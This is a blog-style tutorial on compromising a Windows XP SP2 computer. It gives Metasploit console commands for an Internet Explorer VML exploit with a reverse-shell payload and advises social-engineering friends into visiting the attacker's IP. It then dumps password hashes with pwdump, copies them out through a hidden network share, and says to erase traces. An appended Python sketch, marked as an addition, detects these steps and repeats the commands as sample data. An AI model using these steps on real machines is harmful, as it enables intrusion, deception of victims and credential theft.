Hack Windows XP SP2

* Phew ... I finally had time to finish this paper. Yosh .. here is the proof of concept!
Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.
Having covered the basic concept of a 'standard' hack in the first part and a little about exploits in the second part, let's go straight to practice. Here I deliberately use VMware for the simulation, because not everyone can practice on a real network. With VMware, we can simulate a simple network, as if there were a network between our own computer and other computers. For those who cannot use VMware, try searching the internet! The operating system I use is Windows XP SP2.
The tools I use are the Metasploit Framework for the exploit and PwDump6 to take the hash file from the target computer. What is the Metasploit Framework?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetration testing, shellcode development, and vulnerability research.
For more about using Metasploit, you can read the documentation that is included in the installation. Installing Metasploit version 2.7 requires an administrator user. Previously I tried to install it as a 'limited user', but once installed it could not be executed. The Metasploit installation actually just extracts files, so you can install it without an admin user and put it anywhere, without having to install it in the Program Files folder. After a little tinkering, it turned out it does not need admin to run. It is rather complicated and I am too lazy to write it up here anyway, because when I tried the latest version, version 3 Beta 3, it could be run without installing as an admin user. So why bother! Moreover, version 3 (currently still beta) is cooler and more expensive. Unfortunately, msfweb (the web version) cannot be run fully yet.
OK .. now I assume you have read the Metasploit user guide (ah .. my assumption is probably wrong ;p). To make it cooler and to understand the details, I will explain using only the Metasploit console (msfconsole). Metasploit uses Cygwin to run, because Metasploit is written in Perl. Now let's practice!
First of all, run 'msfconsole'!

To learn which commands are available in msfconsole, use the command 'help'.
Because the target computer is Windows XP SP2, we use an exploit that affects XP SP2, namely one that exploits the Internet Explorer VML Fill Method Code Execution vulnerability.
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
To see the info for this exploit, use the command:
msf > info ie_vml_rectfill
The ie_vml_rectfill exploit targets a vulnerability in Internet Explorer. Therefore, this exploit only takes effect if the target computer runs IE and points its URL at the attacker's computer. For that, we have to use a bit of 'social engineering': for example, in a boarding house / lab / office we tell our friends that we are trying to create a new web application, then ask them to view it using IE at our IP address (or computer name). For example http://192.168.186.1. Usually, after this exploit is executed and the target computer has connected, IE will crash. Wait a few moments to let the exploit 'work'. After a few moments just say "wah .. there's an error. OK .. I'll try to fix it first ... thanks". IE can then only be closed using Task Manager (even with Task Manager, IE is still hard to kill; do not forget to 'end process' 'dumpred.exe' as well, but only after the exploit has worked).

To use the exploit, enter the following commands on the console:
msf > use ie_vml_rectfill
msf > set payload win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
The result will look like the following picture:

In the example above, the target computer's IP (RHOST) is 192.168.186.128, while the attacker's computer (LHOST) is 192.168.186.1. The 'payload' used is 'win32_reverse' and its HTTP PORT is 80 (the default http port). After running the command 'exploit', we ask the target computer to run IE and point its URL at our computer. This process takes some time, and sometimes it does not work at all. So just keep trying.
If you succeed, you will get a 'cmd.exe' from the target computer.

Password Crack!
Well, once we have 'mastered' the target computer, let's take a look at its passwords while we are at it. The trick is similar to my previous article on Password Hack Win XP SP2, but this time it is remote, so we have to 'provide' the required program, namely pwdump. For this method to succeed, I assume that the user logged in on the target computer has admin access. If the user on the target computer whose IE is exploited is only a 'normal' user, pwdump will not work!
First we share pwdump from our computer with full access, so that the dump of the target computer's passwords can be uploaded back to us, but with the suffix '$' so that the share is not visible to computers in general. Suppose the share folder is named pwdump$. Then, from the console that was successfully hacked, map a network drive to the pwdump share on your computer with 'net use'. Example of the commands used:

After that, copy pwdump to a temporary folder 'temp' on the target computer. Once pwdump has been copied to the target computer, run the pwdump command:
C:\temp\pwdump -o pass.txt 127.0.0.1
If successful, it will look like the following figure.

Then copy the pass.txt file to your computer:
copy C:\temp\pass.txt z:
And lastly, do not leave traces that we have stopped by there.

Well, now we have the hash file. All that is left is to crack it .... (see the previous article on cracking the password).
Actually there is a lot more in Metasploit to tinker with. There are many exploits, payloads, meterpreter, etc. that are very 'fun' to tinker with. To learn Metasploit, its website has fairly good documentation.
Happy Hacking .....

Some suggestions so that our Windows stays secure against the exploit above.
1. Do not use Internet Explorer. Use Mozilla Firefox or Opera!
2. Patch your Windows.
3. Use antivirus with the latest updates.
4. Be careful with your own friends .. beware!! :p
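
The steps described above (IE handing over a cmd.exe, 'net use' to a hidden '$' share, pwdump run from a temp folder against 127.0.0.1) leave a recognizable process trail. The following detection sketch is an added example, not part of the original post; the event format (parent image, image, command line), the rule names and the sample events are constructed for illustration.

```python
import ntpath
import re

# Constructed sample process-creation events: (parent image, image, command line).
SAMPLE_EVENTS = [
    (r"C:\WINDOWS\explorer.exe", r"C:\Program Files\Internet Explorer\iexplore.exe",
     "iexplore.exe http://192.168.186.1"),
    (r"C:\Program Files\Internet Explorer\iexplore.exe", r"C:\WINDOWS\system32\cmd.exe",
     "cmd.exe"),
    (r"C:\WINDOWS\system32\cmd.exe", r"C:\WINDOWS\system32\net.exe",
     r"net use z: \\192.168.186.1\pwdump$"),
    (r"C:\WINDOWS\system32\cmd.exe", r"C:\temp\pwdump.exe",
     r"C:\temp\pwdump -o pass.txt 127.0.0.1"),
    (r"C:\WINDOWS\explorer.exe", r"C:\WINDOWS\system32\net.exe",
     r"net use p: \\fileserver\projects"),
]

SHELLS = {"cmd.exe", "command.com"}
BROWSERS = {"iexplore.exe"}
# UNC path whose share name ends in '$' (hidden share).
HIDDEN_SHARE = re.compile(r"\\\\[^\\\s]+\\([^\\\s]+\$)(?:\s|\\|$)")
TEMP_DIR = re.compile(r"\\te?mp\\", re.IGNORECASE)
# Output-file switch followed by a loopback target, as in the pwdump call above.
DUMP_ARGS = re.compile(r"\s-o\s+\S+.*\b(127\.0\.0\.1|localhost)\b", re.IGNORECASE)

def base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()

def classify(parent, image, cmdline):
    """Return the list of rule names one event matches."""
    hits = []
    if base(parent) in BROWSERS and base(image) in SHELLS:
        hits.append("browser_spawned_shell")
    if base(image) in {"net.exe", "net1.exe"} and re.search(r"\buse\b", cmdline, re.I):
        if HIDDEN_SHARE.search(cmdline):
            hits.append("hidden_share_mapped")
    if (TEMP_DIR.search(image) or "pwdump" in base(image)) and DUMP_ARGS.search(cmdline):
        hits.append("hash_dump_from_temp")
    return hits

def scan(events):
    """Return (index, rule) pairs for every matching event, in order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(*ev)]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(idx, rule, SAMPLE_EVENTS[idx][2])
```

Default administrative shares such as IPC$ also match the hidden-share rule, so in practice that rule is most useful when correlated with the other two on the same host.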


Reference : http://www.savehacker.blogspotcom
